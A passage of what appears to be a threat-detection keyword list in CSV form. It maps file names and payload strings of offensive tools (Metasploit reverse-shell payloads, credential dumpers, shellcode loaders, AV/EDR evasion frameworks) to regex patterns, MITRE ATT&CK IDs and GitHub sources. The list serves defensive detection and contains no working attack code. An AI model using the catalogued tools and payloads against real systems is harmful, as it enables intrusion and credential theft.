- TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*windows/shell_reverse_tcp*",".{0,1000}windows\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Windows/System32/cmdlol.exe*",".{0,1000}Windows\/System32\/cmdlol\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter/reverse_tcp*",".{0,1000}windows\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows/x64/meterpreter_reverse_tcp*",".{0,1000}windows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows/x64/shell_reverse_tcp*",".{0,1000}windows\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*windows\samdump.go*",".{0,1000}windows\\samdump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*windows_agent/asm/x64/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x64\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/asm/x86/alter_pe_sections*",".{0,1000}windows_agent\/asm\/x86\/alter_pe_sections.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/dll_main.*",".{0,1000}windows_agent\/dll_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/exe_main.*",".{0,1000}windows_agent\/exe_main\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/win_*.c*",".{0,1000}windows_agent\/win_.{0,1000}\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/win_named_pipe.*",".{0,1000}windows_agent\/win_named_pipe\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_agent/win_shell.*",".{0,1000}windows_agent\/win_shell\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_autologin.md*",".{0,1000}windows_autologin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows_console_interceptor*dll_main.c*",".{0,1000}windows_console_interceptor.{0,1000}dll_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_console_interceptor*exe_main.c*",".{0,1000}windows_console_interceptor.{0,1000}exe_main\.c.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_console_interceptor*interceptor.*",".{0,1000}windows_console_interceptor.{0,1000}interceptor\..{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*windows_credentials.py*",".{0,1000}windows_credentials\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*windows_key.py*",".{0,1000}windows_key\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*windows_recon.bat*",".{0,1000}windows_recon\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*windows_sam_hivenightmare.md*",".{0,1000}windows_sam_hivenightmare\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows_sam_hivenightmare.rb*",".{0,1000}windows_sam_hivenightmare\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Windows_Trojan_Metasploit*",".{0,1000}Windows_Trojan_Metasploit.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*windows10_ntfs_crash_dos*",".{0,1000}windows10_ntfs_crash_dos.{0,1000}","offensive_tool_keyword","POC","PoC for a NTFS crash that I discovered. in various Windows versions Type of issue: denial of service. One can generate blue-screen-of-death using a handcrafted NTFS image. This Denial of Service type of attack. can be driven from user mode. limited user account or Administrator. It can even crash the system if it is in locked state.","T1499.002 - T1059.001 - T1538.002","TA0002 - TA0007 - TA0008","N/A","N/A","DDOS","https://github.com/mtivadar/windows10_ntfs_crash_dos","1","1","N/A","N/A","6","591","131","2020-04-28T18:11:52Z","2018-04-27T19:31:59Z" "*Windows7-BypassLogon-Screen.ino*",".{0,1000}Windows7\-BypassLogon\-Screen\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*WindowsEnum -*",".{0,1000}WindowsEnum\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-WinEnum.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*WindowsExploits*",".{0,1000}WindowsExploits.{0,1000}","offensive_tool_keyword","Exploits","A curated archive of complied and tested public Windows exploits.","T1213 - T1210 - T1188 - T1055","TA0001 - TA0009 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WindowsExploits/Exploits","1","1","N/A","N/A","10","1240","537","2020-05-29T19:09:52Z","2017-06-05T15:39:22Z" "*windows-exploit-suggester.*",".{0,1000}windows\-exploit\-suggester\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*windows-forkbomb.ino*",".{0,1000}windows\-forkbomb\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*WindowsLies*BlockWindows*",".{0,1000}WindowsLies.{0,1000}BlockWindows.{0,1000}","offensive_tool_keyword","BlockWindows","Stop Windows 7 through 10 Nagging and Spying updates. Tasks. IPs. and services. Works with Windows 7 through 10","T1059 - T1562 - T1053 - T1543","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","Defense Evasion","https://github.com/WindowsLies/BlockWindows","1","1","N/A","N/A","7","641","109","2020-04-11T15:38:12Z","2015-08-26T01:17:57Z" "*Windows-Post-Exploitation*",".{0,1000}Windows\-Post\-Exploitation.{0,1000}","offensive_tool_keyword","Windows-Post-Exploitation","Windows Post Exploitation list of tools on github. could also be related to folder name","T1021 - T1059 - T1078 - T1056 - T1028 - T1053 - T1003","TA0002 - TA0003 - TA0004 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/emilyanncr/Windows-Post-Exploitation","1","1","N/A","N/A","6","507","117","2021-09-20T01:47:13Z","2017-11-18T04:16:41Z" "*windows-privesc-check*",".{0,1000}windows\-privesc\-check.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*Windows-Privilege-Escalation*",".{0,1000}Windows\-Privilege\-Escalation.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*WindowsShareFinder.cs*",".{0,1000}WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*window-state@safejka.eu*",".{0,1000}window\-state\@safejka\.eu.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*winexec.notepad.raw*",".{0,1000}winexec\.notepad\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*WinhttpShellcode.cpp*",".{0,1000}WinhttpShellcode\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*WinhttpShellcode.exe*",".{0,1000}WinhttpShellcode\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*WinhttpShellcode.sln*",".{0,1000}WinhttpShellcode\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*WinhttpShellcode.vcxproj*",".{0,1000}WinhttpShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*Win-Ops-Master.*",".{0,1000}Win\-Ops\-Master\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Winpayloads*",".{0,1000}Winpayloads.{0,1000}","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","10","1544","336","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z" "*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*WinPEAS.exe*",".{0,1000}WinPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEAS.exe*",".{0,1000}winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*winPEAS.Info.FilesInfo.Office.Office*",".{0,1000}winPEAS\.Info\.FilesInfo\.Office\.Office.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*winPEAS.ps1*",".{0,1000}winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*winPEAS.txt*",".{0,1000}winPEAS\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - 